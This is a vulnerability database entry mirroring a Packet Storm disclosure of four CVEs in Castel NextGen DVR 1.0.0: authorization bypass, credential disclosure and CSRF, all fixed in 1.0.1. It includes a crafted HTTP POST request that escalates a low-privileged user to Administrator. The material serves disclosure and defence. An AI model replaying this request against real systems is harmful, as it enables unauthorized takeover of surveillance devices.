ID

VAR-E-202006-0013


CVE

cve_id:CVE-2020-11679

Trust: 0.5

cve_id:CVE-2020-11680

Trust: 0.5

cve_id:CVE-2020-11681

Trust: 0.5

cve_id:CVE-2020-11682

Trust: 0.5

sources: PACKETSTORM: 157954

TITLE

Castel NextGen DVR 1.0.0 Bypass / CSRF / Disclosure

Trust: 0.5

sources: PACKETSTORM: 157954

DESCRIPTION

Castel NextGen DVR version 1.0.0 suffers from authorization bypass, credential disclosure, and cross site request forgery vulnerabilities.

Trust: 0.5

sources: PACKETSTORM: 157954

AFFECTED PRODUCTS

vendor:castelmodel:nextgen dvrscope:eqversion:1.0.0

Trust: 0.5

sources: PACKETSTORM: 157954

EXPLOIT

All issues are associated with *Castel NextGen DVR v1.0.0 *and have been
resolved in v1.0.1*.*

-------------------------------
*CVE-2020-11679
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11679>*

*Original Disclosure*
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

*Description*
A low privileged user can call functionality reserved for an Administrator
which promotes a low privileged account to the Administrator role:

POST /Administration/Users/Edit/:ID HTTP/1.1
> Host: $RHOST
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
> Firefox/52.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Cookie: $REVIEWER_COOKIES
> DNT: 1
> Connection: close
> Upgrade-Insecure-Requests: 1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 349

> UserId=:ID&Email=bypass%40test.com
> &FirstName=bypass&LastName=bypass&LDAPUser=false
>
> &Roles%5B0%5D.RoleId=1&Roles%5B0%5D.IsSelected=true&Roles%5B0%5D.IsSelected=false
>
> &Roles%5B1%5D.RoleId=3&Roles%5B1%5D.IsSelected=true&Roles%5B1%5D.IsSelected=false
>
> &Roles%5B2%5D.RoleId=5&Roles%5B2%5D.IsSelected=true&Roles%5B2%5D.IsSelected=false
> &Locked=false

-------------------------------
*CVE-2020-11680
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11680>*

*Original Disclosure*
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

*Description*
The application does not perform an authorization check before
functionality is performed. Low privileged users are prevented from
browsing to pages that perform Administrator functionality using GET,
however, functionality can be performed by directly crafting the associated
POST request. This can be exploited to modify user accounts, modify the
application, etc. Combined with the reported CSRF, CVE-2020-11682, any
user of the application can be used to grant Administrator access to a
malicious user.
-------------------------------
*CVE-2020-11681
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11681>*

*Original Disclosure*
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

*Description*
Credentials are returned in cleartext in the source of the SMTP page. If a
malicious user compromises an account. or exploits the CSRF to gain access
to the application, the associated SMTP server/account could also be
compromised.
-------------------------------
*CVE-2020-11682
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11682>*

*Original Disclosure*
https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf

*Description*
The application does not properly prevent CSRF; the
__RequestVerificationToken, which is included with state changing requests,
is not verified by the application - requests are successful even when the
token is removed.

AARON BISHOP | Principal Penetration Tester CISSP, OSCP, OSWE [image:
SecurityMetrics]

Trust: 0.5

sources: PACKETSTORM: 157954

EXPLOIT HASH

LOCAL

SOURCE

md5: aa89a93b4527459f2ae2ef8eb52607af
sha-1: 1a5ad33ffa42a86f4bb778c0bdaf6de95b2e5c31
sha-256: 479f4579b4b9aa4978606f0a9f84e9bbac7947654e1a57a9e42f9f18e0988c1b
md5: aa89a93b4527459f2ae2ef8eb52607af

Trust: 0.5

sources: PACKETSTORM: 157954

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 157954

TYPE

bypass, info disclosure, csrf

Trust: 0.5

sources: PACKETSTORM: 157954

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:bypass

Trust: 0.5

tag:info disclosure

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 157954

CREDITS

Aaron Bishop

Trust: 0.5

sources: PACKETSTORM: 157954

EXTERNAL IDS

db:NVDid:CVE-2020-11680

Trust: 0.5

db:NVDid:CVE-2020-11679

Trust: 0.5

db:NVDid:CVE-2020-11681

Trust: 0.5

db:NVDid:CVE-2020-11682

Trust: 0.5

db:PACKETSTORMid:157954

Trust: 0.5

sources: PACKETSTORM: 157954

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2020-11682

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2020-11681

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2020-11680

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2020-11679

Trust: 0.5

sources: PACKETSTORM: 157954

SOURCES

db:PACKETSTORMid:157954

LAST UPDATE DATE

2022-07-27T09:51:26.086000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:157954date:2020-06-05T18:19:24